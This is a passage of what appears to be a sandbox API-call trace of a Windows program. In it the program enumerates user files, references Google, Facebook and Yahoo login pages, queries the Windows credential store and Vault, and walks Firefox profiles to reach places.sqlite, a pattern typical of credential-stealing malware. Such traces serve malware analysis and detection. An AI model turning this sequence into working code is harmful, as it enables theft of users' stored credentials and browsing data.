returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/h2k4aabsc75.mp3" [0067.357] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/DWNR3iLb9szEV1.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/dwnr3ilb9szev1.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/dwnr3ilb9szev1.jpg" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/t4tPcVg9UPnJ6f/ZO6am-HNBH.flv" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/zo6am-hnbh.flv") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/t4tpcvg9upnj6f/zo6am-hnbh.flv" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/CIvwLQB/9Aaopeo-xDU-1n7Fq10.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/9aaopeo-xdu-1n7fq10.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/9aaopeo-xdu-1n7fq10.m4a" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/1xuVZf5IGS.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/1xuvzf5igs.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf/1xuvzf5igs.mp3" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/9egdyCZENQXClLPjWi4.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/9egdyczenqxcllpjwi4.wav") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/9egdyczenqxcllpjwi4.wav" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/Q7cASKUhLK6F8qVSWz_.doc" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/q7caskuhlk6f8qvswz_.doc") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/q7caskuhlk6f8qvswz_.doc" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/zxr1unigqisvcnnn/jhdw-e/l_asyxf" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/b%20NKFTFyl_1gdJ.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/b%20nkftfyl_1gdj.mp3") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/mbesymhln%20bmw/b%20nkftfyl_1gdj.mp3" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/hDk8a9K.rtf" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/hdk8a9k.rtf") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/hdk8a9k.rtf" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/iOBaL3Oyi11vA.odp" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/iobal3oyi11va.odp") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/iobal3oyi11va.odp" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/C%20nq.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/c%20nq.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/c%20nq.avi" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/77msrfRfxgs7ZXC.ots" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/77msrfrfxgs7zxc.ots") returned="file:///c:/users/ciihmnxmn6ps/documents/0v337lurz/77msrfrfxgs7zxc.ots" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/dtOvxYWvk1G7N.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/dtovxywvk1g7n.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/dtovxywvk1g7n.m4a" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/U90It07OJ99mY17x3zk.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/u90it07oj99my17x3zk.mp4") returned="file:///c:/users/ciihmnxmn6ps/videos/u90it07oj99my17x3zk.mp4" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/mOlSIqK8SWHaX.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/molsiqk8swhax.wav") returned="file:///c:/users/ciihmnxmn6ps/desktop/molsiqk8swhax.wav" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/23qU4m9Im.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/23qu4m9im.bmp") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/23qu4m9im.bmp" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/39sgilOX.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/39sgilox.m4a") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/39sgilox.m4a" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/oPYcwRIveiqTmmQQ5BbE.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/opycwriveiqtmmqq5bbe.bmp") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/opycwriveiqtmmqq5bbe.bmp" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/lRlXI62X.ots" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/lrlxi62x.ots") returned="file:///c:/users/ciihmnxmn6ps/documents/lrlxi62x.ots" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/vkxOisP_ywzX.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/vkxoisp_ywzx.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/vkxoisp_ywzx.avi" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/KbE_v-zbeKXVWmnco.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/kbe_v-zbekxvwmnco.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/kbe_v-zbekxvwmnco.png" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/34AjT.png" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/34ajt.png") returned="file:///c:/users/ciihmnxmn6ps/desktop/34ajt.png" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/UTgP.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/utgp.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/utgp.jpg" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/n0Pocjee.avi" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/n0pocjee.avi") returned="file:///c:/users/ciihmnxmn6ps/videos/n0pocjee.avi" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/z9lc--e.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/z9lc--e.jpg") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/z9lc--e.jpg" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/XWAB.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/xwab.gif") returned="file:///c:/users/ciihmnxmn6ps/desktop/xwab.gif" [0067.358] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/tUZIMiW1fowTB.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/tuzimiw1fowtb.mp4") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/tuzimiw1fowtb.mp4" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/8XMK5d.ots" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/8xmk5d.ots") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/8xmk5d.ots" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/B1V1F.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/b1v1f.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/b1v1f.xlsx" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/XbJoeg.doc" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/xbjoeg.doc") returned="file:///c:/users/ciihmnxmn6ps/documents/xbjoeg.doc" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/nhVhwfpevWnzE9IdPIpW.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/nhvhwfpevwnze9idpipw.gif") returned="file:///c:/users/ciihmnxmn6ps/desktop/nhvhwfpevwnze9idpipw.gif" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/JsSDMtvURKS0QgzLyFc.pptx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/jssdmtvurks0qgzlyfc.pptx") returned="file:///c:/users/ciihmnxmn6ps/documents/jssdmtvurks0qgzlyfc.pptx" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/LpHlT%202w58vW1zcu3O7.mkv" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lphlt%202w58vw1zcu3o7.mkv") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/lphlt%202w58vw1zcu3o7.mkv" [0067.359] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/yZ3xp1GKjmS.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/music/hnak4r/yz3xp1gkjms.wav") returned="file:///c:/users/ciihmnxmn6ps/music/hnak4r/yz3xp1gkjms.wav" [0067.359] _wcslwr (in: _String="https://www.google.com/accounts/servicelogin" | out: _String="https://www.google.com/accounts/servicelogin") returned="https://www.google.com/accounts/servicelogin" [0067.359] _wcslwr (in: _String="http://www.facebook.com/" | out: _String="http://www.facebook.com/") returned="http://www.facebook.com/" [0067.359] _wcslwr (in: _String="https://login.yahoo.com/config/login" | out: _String="https://login.yahoo.com/config/login") returned="https://login.yahoo.com/config/login" [0067.359] CryptReleaseContext (hProv=0x671840, dwFlags=0x0) returned 1 [0067.359] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x74c60000 [0067.359] GetProcAddress (hModule=0x74c60000, lpProcName="CredReadA") returned 0x74c958f0 [0067.359] GetProcAddress (hModule=0x74c60000, lpProcName="CredFree") returned 0x74c84010 [0067.359] GetProcAddress (hModule=0x74c60000, lpProcName="CredDeleteA") returned 0x74c956b0 [0067.359] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateA") returned 0x74c95710 [0067.360] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateW") returned 0x74c83950 [0067.360] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0x19926c, Credential=0x199270 | out: Count=0x19926c, Credential=0x199270) returned 0 [0067.365] FreeLibrary (hLibModule=0x74c60000) returned 1 [0067.365] LoadLibraryW (lpLibFileName="pstorec.dll") returned 0x73110000 [0067.395] GetProcAddress (hModule=0x73110000, lpProcName="PStoreCreateInstance") returned 0x73111290 [0067.395] PStoreCreateInstance () returned 0x80004001 [0067.395] FreeLibrary (hLibModule=0x73110000) returned 1 [0067.396] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x71590000 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultOpenVault") returned 0x71599e10 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultCloseVault") returned 0x71599e80 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultEnumerateItems") returned 0x71599c80 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultFree") returned 0x71599690 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultGetInformation") returned 0x715ab9a0 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultGetItem") returned 0x71599bf0 [0067.705] GetProcAddress (hModule=0x71590000, lpProcName="VaultGetItem") returned 0x71599bf0 [0067.705] VaultOpenVault () returned 0x0 [0067.706] VaultEnumerateItems () returned 0x0 [0067.706] VaultFree () returned 0x71599690 [0067.706] VaultCloseVault () returned 0x6 [0067.707] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x198bc4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0067.707] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0067.707] wcscat (in: _Dest=0x198bc4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0067.707] wcscat (in: _Dest=0x198bc4, _Source="Mozilla\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Profiles" [0067.707] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x198dd0, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0067.707] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0067.707] wcscat (in: _Dest=0x198dd0, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0067.707] wcscat (in: _Dest=0x198dd0, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.708] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Profiles") returned 0x36 [0067.708] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Profiles\\*.*", lpFindFileData=0x198444 | out: lpFindFileData=0x198444) returned 0xffffffff [0067.708] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.708] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x198444 | out: lpFindFileData=0x198444) returned 0x65f088 [0067.709] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.709] wcslen (_String=".") returned 0x1 [0067.709] wcscpy (in: _Dest=0x198694, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.709] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.709] wcscat (in: _Dest=0x198694, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0067.709] wcscat (in: _Dest=0x198694, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\." [0067.709] wcscmp (_String1=".", _String2="..") returned -1 [0067.709] wcscmp (_String1=".", _String2=".") returned 0 [0067.709] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x198444 | out: lpFindFileData=0x198444) returned 1 [0067.709] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.709] wcslen (_String="..") returned 0x2 [0067.709] wcscpy (in: _Dest=0x198694, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.709] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.709] wcscat (in: _Dest=0x198694, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0067.709] wcscat (in: _Dest=0x198694, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.." [0067.709] wcscmp (_String1="..", _String2="..") returned 0 [0067.709] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x198444 | out: lpFindFileData=0x198444) returned 1 [0067.709] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.709] wcslen (_String="8i341t8m.default") returned 0x10 [0067.709] wcscpy (in: _Dest=0x198694, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.709] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.709] wcscat (in: _Dest=0x198694, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0067.709] wcscat (in: _Dest=0x198694, _Source="8i341t8m.default" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0067.709] wcscmp (_String1="8i341t8m.default", _String2="..") returned 1 [0067.710] wcscmp (_String1="8i341t8m.default", _String2=".") returned 1 [0067.710] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x4f [0067.710] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x198444 | out: lpFindFileData=0x198444) returned 0 [0067.710] FindClose (in: hFindFile=0x65f088 | out: hFindFile=0x65f088) returned 1 [0067.710] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\history.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\history.dat")) returned 0xffffffff [0067.711] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x4f [0067.711] wcslen (_String="places.sqlite") returned 0xd [0067.711] wcscpy (in: _Dest=0x198ff8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0067.711] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x4f [0067.711] wcscat (in: _Dest=0x198ff8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\" [0067.711] wcscat (in: _Dest=0x198ff8, _Source="places.sqlite" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" [0067.711] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite")) returned 0x20 [0067.712] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 0x5d [0067.713] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x224 [0067.713] GetFileTime (in: hFile=0x224, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x19926c | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x19926c*(dwLowDateTime=0x3e01eda, dwHighDateTime=0x1d2d446)) returned 1 [0067.713] CloseHandle (hObject=0x224) returned 1 [0067.713] CompareFileTime (lpFileTime1=0x19926c, lpFileTime2=0x199274) returned 1 [0067.713] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 0x5d [0067.713] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x199048, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0067.713] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x198808, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.713] wcslen (_String="Mozilla\\Firefox\\Profiles") returned 0x18 [0067.713] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0067.713] wcscpy (in: _Dest=0x198e38, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0067.713] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0067.713] wcscat (in: _Dest=0x198e38, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0067.713] wcscat (in: _Dest=0x198e38, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.713] wcslen (_String="Mozilla\\Firefox\\Profiles") returned 0x18 [0067.713] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0067.713] wcscpy (in: _Dest=0x198c28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0067.713] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0067.713] wcscat (in: _Dest=0x198c28, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0067.713] wcscat (in: _Dest=0x198c28, _Source="Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0067.714] wcslen (_String="Mozilla\\Firefox") returned 0xf [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0067.714] wcscpy (in: _Dest=0x198a18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 0x25 [0067.714] wcscat (in: _Dest=0x198a18, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0067.714] wcscat (in: _Dest=0x198a18, 